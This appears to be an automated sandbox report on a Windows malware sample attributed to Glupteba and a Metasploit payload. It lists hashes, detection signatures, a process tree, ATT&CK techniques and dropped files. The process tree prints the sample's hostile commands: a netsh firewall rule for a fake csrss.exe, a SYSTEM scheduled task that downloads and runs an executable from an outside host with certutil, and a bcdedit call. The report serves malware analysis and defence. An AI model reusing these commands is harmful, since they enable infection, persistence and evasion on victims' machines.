Analysis

  • max time kernel
    143s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-01-2023 19:09

General

  • Target

    02f051b927631c06256e00bf2f74b6aca614b823fbdd720356b336c53df126be.exe

  • Size

    3.8MB

  • MD5

    538ea49c4004a2ef3b7c35e876f0184a

  • SHA1

    bcf4a566f62c51bc152c87807066eeb2d016dc40

  • SHA256

    02f051b927631c06256e00bf2f74b6aca614b823fbdd720356b336c53df126be

  • SHA512

    30317e48ab598c7eb9f36db6cc911133ef1ffe72bfe4d177d3716d75d78f47677971450afa4430e4268ebe3a4dd9100444eb3eab82fde07d40749ae0cb5e4167

  • SSDEEP

    98304:FP7FlFImYKIWmYyh1WjDVY/t+Fq4j1ZmmcNBb:d7HFZIUyhc/VY/z2Z6R

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 7 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\02f051b927631c06256e00bf2f74b6aca614b823fbdd720356b336c53df126be.exe
    "C:\Users\Admin\AppData\Local\Temp\02f051b927631c06256e00bf2f74b6aca614b823fbdd720356b336c53df126be.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4572
    • C:\Users\Admin\AppData\Local\Temp\02f051b927631c06256e00bf2f74b6aca614b823fbdd720356b336c53df126be.exe
      "C:\Users\Admin\AppData\Local\Temp\02f051b927631c06256e00bf2f74b6aca614b823fbdd720356b336c53df126be.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4972
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5056
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:4720
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3184
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:204
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:176
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:2412
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:548
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5008

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Modify Existing Service

1
T1031

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
    Filesize

    1.7MB

    MD5

    13aaafe14eb60d6a718230e82c671d57

    SHA1

    e039dd924d12f264521b8e689426fb7ca95a0a7b

    SHA256

    f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

    SHA512

    ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

  • C:\Windows\rss\csrss.exe
    Filesize

    3.8MB

    MD5

    538ea49c4004a2ef3b7c35e876f0184a

    SHA1

    bcf4a566f62c51bc152c87807066eeb2d016dc40

    SHA256

    02f051b927631c06256e00bf2f74b6aca614b823fbdd720356b336c53df126be

    SHA512

    30317e48ab598c7eb9f36db6cc911133ef1ffe72bfe4d177d3716d75d78f47677971450afa4430e4268ebe3a4dd9100444eb3eab82fde07d40749ae0cb5e4167

  • C:\Windows\rss\csrss.exe
    Filesize

    3.8MB

    MD5

    538ea49c4004a2ef3b7c35e876f0184a

    SHA1

    bcf4a566f62c51bc152c87807066eeb2d016dc40

    SHA256

    02f051b927631c06256e00bf2f74b6aca614b823fbdd720356b336c53df126be

    SHA512

    30317e48ab598c7eb9f36db6cc911133ef1ffe72bfe4d177d3716d75d78f47677971450afa4430e4268ebe3a4dd9100444eb3eab82fde07d40749ae0cb5e4167

  • memory/176-146-0x0000000000000000-mapping.dmp
  • memory/204-147-0x0000000000000000-mapping.dmp
  • memory/548-150-0x0000000000000000-mapping.dmp
  • memory/2412-148-0x0000000000000000-mapping.dmp
  • memory/3184-141-0x0000000000000000-mapping.dmp
  • memory/3184-152-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/3184-151-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/3184-145-0x0000000001600000-0x00000000019A8000-memory.dmp
    Filesize

    3.7MB

  • memory/4572-134-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/4572-132-0x00000000011BF000-0x0000000001567000-memory.dmp
    Filesize

    3.7MB

  • memory/4572-133-0x0000000001570000-0x0000000001D74000-memory.dmp
    Filesize

    8.0MB

  • memory/4572-136-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/4720-138-0x0000000000000000-mapping.dmp
  • memory/4972-143-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/4972-135-0x0000000000000000-mapping.dmp
  • memory/4972-140-0x0000000000400000-0x0000000000C1E000-memory.dmp
    Filesize

    8.1MB

  • memory/4972-139-0x00000000011C8000-0x0000000001570000-memory.dmp
    Filesize

    3.7MB

  • memory/5056-137-0x0000000000000000-mapping.dmp